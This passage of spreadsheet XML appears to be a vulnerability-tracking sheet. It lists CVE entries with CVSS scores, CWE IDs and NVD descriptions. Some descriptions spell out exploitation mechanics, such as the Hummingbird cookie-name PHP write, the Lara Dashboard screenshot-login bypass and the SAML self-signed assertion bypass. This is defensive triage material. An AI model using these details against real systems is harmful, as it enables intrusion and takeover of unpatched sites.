      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr"/>
      <c r="Q97" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>An issue in the gateway server of mpush v0.8.1 allows attackers to execute arbitrary code via sending a crafted broadcast message.</t>
        </is>
      </c>
      <c r="S97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79574</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79576</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr"/>
      <c r="Q98" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>An issue in the Single-Sign On (SSO) component of Digital-Infrastructure v9.6.7 allows attackers to authenticate as any user, including the Admin, without a password.</t>
        </is>
      </c>
      <c r="S98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79576</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79577</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr"/>
      <c r="Q99" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>An issue in the /cas/login component of sso-master v1.0.0 allows attackers to authenticate into the application without a password via sending a crafted POST request.</t>
        </is>
      </c>
      <c r="S99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79577</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82923</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr"/>
      <c r="Q100" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>The AI Website Builder WordPress plugin (GitHub build) 1.0.0 does not perform any authorisation or nonce check on its REST API routes, allowing unauthenticated attackers to install and activate plugins and themes, import content from a URL under their control, write a file of their choosing into the uploads directory, and delete site content and media. On a host that serves PHP from the uploads directory, that file write is remote code execution.</t>
        </is>
      </c>
      <c r="S100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82923</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83627</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr"/>
      <c r="Q101" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>The Hummingbird – Speed Optimization, Caching, Minify, Compress &amp; CDN plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.21.0 via the log_msg() function in core/modules/class-page-cache.php. The page-cache debug log is written to wp-content/wphb-logs/page-caching-log.php, a directly web-accessible PHP file that is supposed to be protected by a leading '&lt;?php die(); ?&gt;' header. That header is guarded by class_exists( 'Filesystem' ), which can never match because class_exists() resolves string arguments in the global namespace while the class is Hummingbird\Core\Filesystem; when the log is created during a front-end request the header is therefore omitted entirely. get_cookies() then writes the raw name of any cookie matching the wphb_cache_ prefix into that file without sanitization. This makes it possible for unauthenticated attackers to write arbitrary PHP into the log file with a single anonymous request and execute it by requesting the file directly, resulting in full remote code execution. Exploitation requires the site administrator to have enabled Page Caching with the Debug Log option (non-default), and the log file to be created during a front-end request — a state reached by the plugin's own 'Clear logs' action, any cache flush, or unattended via the plugin's daily log-rotation cron, which can strip the protective header from an existing log file.</t>
        </is>
      </c>
      <c r="S101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83627</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85504</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr"/>
      <c r="Q102" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>FreeIPMI before 1.6.19 has a stack-based buffer overflow in _ipmi_sel_oem_fujitsu_get_sel_entry_long_text in libfreeipmi/sel/ipmi-sel-string-fujitsu-irmc-common.c via malformed Fujitsu SEL long-text responses.</t>
        </is>
      </c>
      <c r="S102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85504</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85508</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr"/>
      <c r="Q103" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer overflow in _output_dell_system_info_cmc_ipv6_info in ipmi-oem/ipmi-oem-dell.c (cmc-ipv6-info subcommand to dell get-system-info).</t>
        </is>
      </c>
      <c r="S103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85508</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85509</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr"/>
      <c r="Q104" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>FreeIPMI before 1.6.19 has a stack-based buffer overflow in _read_fru_data in libfreeipmi/fru/ipmi-fru.c when a BMC returns more bytes than requested.</t>
        </is>
      </c>
      <c r="S104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85509</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86184</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr"/>
      <c r="Q105" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard before 1.3.0 contains an authentication bypass vulnerability in the screenshot-login route that allows unauthenticated attackers to authenticate as any user by email when APP_ENV is not production. Attackers can request the GET /screenshot-login/{email} endpoint with a registered email address to receive a fully authenticated session, enabling access to user administration, settings, database contents, and arbitrary code execution through the module installer.</t>
        </is>
      </c>
      <c r="S105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86184</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86189</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr"/>
      <c r="Q106" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a path traversal vulnerability in notify.ffmpeg.json.php that allows unauthenticated attackers to write files to arbitrary locations by supplying a caller-chosen path in the avideoRelativePath parameter. Attackers can replay any previously issued ciphertext as a notifyCode token, which is decrypted but never validated, to bypass authentication and write files to the application root and subdirectories.</t>
        </is>
      </c>
      <c r="S106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86189</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86219</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr"/>
      <c r="Q107" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>Authen::SASL::Perl::DIGEST_MD5 versions before 2.2100 for Perl accept replayed authentication responses via unverified nonce in server_step.
server_start generates a fresh nonce and sends it in the challenge, and nothing later compares that value against the nonce the client returns. server_step derives the expected digest from the client's own parameters, so a response verifies whenever its digest matches the nonce it carries. The count table it also checks is keyed on the client-supplied nonce and starts empty in each new server object, so a captured first response, carrying `nc=00000001`, passes that too. RFC 2831 defines the nonce in the response as the value the server sent in the preceding challenge.
An attacker who observes one successful `qop=auth` exchange can replay the captured response against a later session for the same service, host, realm and user, and authenticate as that user without knowing the password.</t>
        </is>
      </c>
      <c r="S107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86219</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86304</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr"/>
      <c r="Q108" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>MojoX::Authentication versions before 0.006 for Perl allow SAML authentication bypass because parse_assertion builds Net::SAML2::Binding::POST without a trust anchor.
parse_assertion in MojoX::Authentication::Model::SAML2 calls Net::SAML2::Binding::POST-&gt;new with no cacert, cert_text or anchors argument, then passes the returned XML to Net::SAML2::Protocol::Assertion-&gt;new_from_xml with the IdP signing certificate as cacert. In Net::SAML2 before 0.86 that certificate guards only encrypted assertions, so the signature on an unencrypted assertion is checked against the certificate the response itself carries.
An attacker starts a SAML login, then posts a response signed with a certificate of their own. The audience, InResponseTo and timestamp checks that follow are all satisfiable by the attacker, so the response authenticates any NameID it carries.</t>
        </is>
      </c>
      <c r="S108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86304</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19274</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr"/>
      <c r="Q109" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R109"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S109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19274</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53552</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr"/>
      <c r="Q110" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>Goploy is an open-source automation deployment system. In versions 1.17.5 and prior, Project.AddFile, Project.EditFile, Project.RemoveFile, and Project.Edit in cmd/server/api/project/handler.go accept a project or project-file row id from the JSON body and act on it without checking that the project belongs to the caller's namespace. The corresponding model.ProjectFile.GetData and model.Project.GetData queries filter only by row id. A user holding the manager role (or any role that includes the FileSync / EditProject permission) in their own namespace can read, write, or delete files in any project across the install, and can rewrite any project's git remote URL by submitting the foreign id in the body. The git-URL primitive escalates to RCE on the next deploy because Edit runs git remote set-url on the project's working tree. At time of publication, there are no known publicly available patches.</t>
        </is>
      </c>
      <c r="S110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53552</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65669</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr"/>
      <c r="Q111" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in output used by a downstream component ('injection') in SQL Server allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65669</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81376</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr"/>
      <c r="Q112" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-693</t>
        </is>
      </c>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84333</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr"/>
      <c r="Q113" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>Use after free in Dawn in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84333</t>
        </is>
      </c>
    </row>
    <row r="114">
